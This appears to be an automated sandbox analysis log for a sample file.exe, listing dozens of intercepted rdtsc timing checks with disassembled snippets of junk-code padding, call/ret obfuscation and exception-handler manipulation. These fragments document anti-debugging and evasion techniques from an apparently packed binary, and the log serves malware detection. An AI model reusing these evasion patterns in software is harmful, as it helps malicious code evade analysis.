Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49101 second address: B49141 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jp 00007FF624B4E7D6h 0x00000011 jmp 00007FF624B4E7DFh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF624B4E7E0h 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49141 second address: B49147 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67B85 second address: B67B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF624B4E7E0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D5D second address: B67D63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D63 second address: B67D83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF624B4E7D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FF624B4E7D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D83 second address: B67D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D89 second address: B67D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D8F second address: B67D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F12 second address: B67F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F1E second address: B67F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68252 second address: B68258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68258 second address: B6825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B683AC second address: B683B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68928 second address: B6892F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68E8D second address: B68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6914C second address: B6915A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jc 00007FF624C752F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6915A second address: B69167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FF624B4E7DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B692CB second address: B692E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B692E5 second address: B6930B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FF624B4E7D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6959D second address: B695B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752FAh 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FF624C752FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B695B8 second address: B695C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624B4E7D8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B695C8 second address: B695CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736E1 second address: B736FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DDh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736FB second address: B736FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73813 second address: B73817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73817 second address: B7382E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a js 00007FF624C752F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7382E second address: B73832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73832 second address: B73838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DD5 second address: B73DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DD9 second address: B73DF3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C752FCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DF3 second address: B73DFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624B4E7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B774A8 second address: B774AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B774AC second address: B774B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77B54 second address: B77B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77C36 second address: B77C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B780D0 second address: B780E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781B3 second address: B781B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781B7 second address: B781CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FF624C752F6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781CA second address: B781D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7824F second address: B78253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78253 second address: B78259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78259 second address: B78273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF624C752FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78273 second address: B78278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78278 second address: B7827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7827E second address: B78282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78603 second address: B78609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7878B second address: B78790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78790 second address: B787F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FF624C752F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF624C752F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx esi, dx 0x0000002c jmp 00007FF624C75309h 0x00000031 xchg eax, ebx 0x00000032 jg 00007FF624C75300h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e jg 00007FF624C752F6h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B787F7 second address: B7880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA78 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA7C second address: B7DA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA80 second address: B7DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA86 second address: B7DA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F9D8 second address: B7F9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F9DC second address: B7F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81003 second address: B8106D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FF624C752F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, C74Ah 0x00000013 adc ebx, 47C85D40h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FF624C752F8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push esi 0x00000036 pushad 0x00000037 add dword ptr [ebp+124517A8h], ecx 0x0000003d mov dword ptr [ebp+122D19B0h], edi 0x00000043 popad 0x00000044 pop ebx 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D183Dh] 0x0000004c movzx ecx, si 0x0000004f popad 0x00000050 push 00000000h 0x00000052 add edi, dword ptr [ebp+122D1D70h] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007FF624C752F6h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8106D second address: B81073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8653D second address: B86542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B86542 second address: B86548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81235 second address: B81242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8406A second address: B84070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81242 second address: B81247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89712 second address: B89718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8233E second address: B82344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84070 second address: B84074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81247 second address: B8124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89718 second address: B89741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FF624B4E7D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 jnp 00007FF624B4E7DEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84074 second address: B8408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89741 second address: B89745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8408C second address: B8414B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF624C752FCh 0x0000000e popad 0x0000000f nop 0x00000010 xor bx, F20Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF624C752F8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 add dword ptr [ebp+1244E042h], ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 add ebx, 5A3A60A7h 0x00000049 sub dword ptr [ebp+122D1DCDh], edi 0x0000004f mov eax, dword ptr [ebp+122D00ADh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FF624C752F8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bx, 6600h 0x00000073 push FFFFFFFFh 0x00000075 jp 00007FF624C752FCh 0x0000007b mov edi, dword ptr [ebp+122D2CA3h] 0x00000081 sub ebx, dword ptr [ebp+122D1995h] 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b jmp 00007FF624C75309h 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 popad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81356 second address: B81360 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AD08 second address: B8AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81360 second address: B81366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C299 second address: B8C2FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF624C752F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FF624C752F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 call 00007FF624C75302h 0x00000035 mov bx, 56A7h 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d mov bl, 8Bh 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FF624C752FCh 0x00000049 jno 00007FF624C752F6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B547 second address: B8B558 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B558 second address: B8B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E2F0 second address: B8E351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 45598F98h 0x0000000f push 00000000h 0x00000011 sbb bl, FFFFFFB7h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF624B4E7D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 jmp 00007FF624B4E7E8h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E351 second address: B8E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F271 second address: B8F275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F275 second address: B8F292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624C75303h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9035B second address: B9035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9035F second address: B90363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8D3D8 second address: B8D3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E4AC second address: B8E4BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF624C752F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B924E0 second address: B924EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B916B5 second address: B916CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007FF624C75300h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C488 second address: B8C50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244E12Ch], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FF624B4E7D8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 and bh, FFFFFFF1h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FF624B4E7D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 mov eax, dword ptr [ebp+122D0CB1h] 0x0000005f xor bh, FFFFFFB3h 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 33D388C9h 0x0000006a nop 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
